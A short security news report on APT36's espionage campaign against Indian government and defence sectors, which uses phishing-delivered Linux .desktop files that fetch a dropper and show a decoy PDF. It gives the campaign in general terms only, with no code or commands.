Pakistan-linked hacking group APT36, active since 2013, is launching a new cyberespionage campaign against Indian government and defense sectors. Known for its tailored attacks, APT36 now uses Linux .desktop files normally used for app shortcuts to deliver malware through phishing emails disguised as procurement documents.
The malicious files, hidden in ZIP archives, fetch a dropper from Google Drive and display a decoy PDF to avoid suspicion. Once activated, the malware establishes persistence, evades detection, and connects to command servers via WebSockets.
Security firms CloudSEK and Cyfirma highlight this shift as a sign of growing sophistication, with APT36 adapting its tools to Linux environments and expanding its reach beyond India. The campaign blends traditional Windows malware and mobile implants, signaling a broader strategy to infiltrate hardened systems.
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.
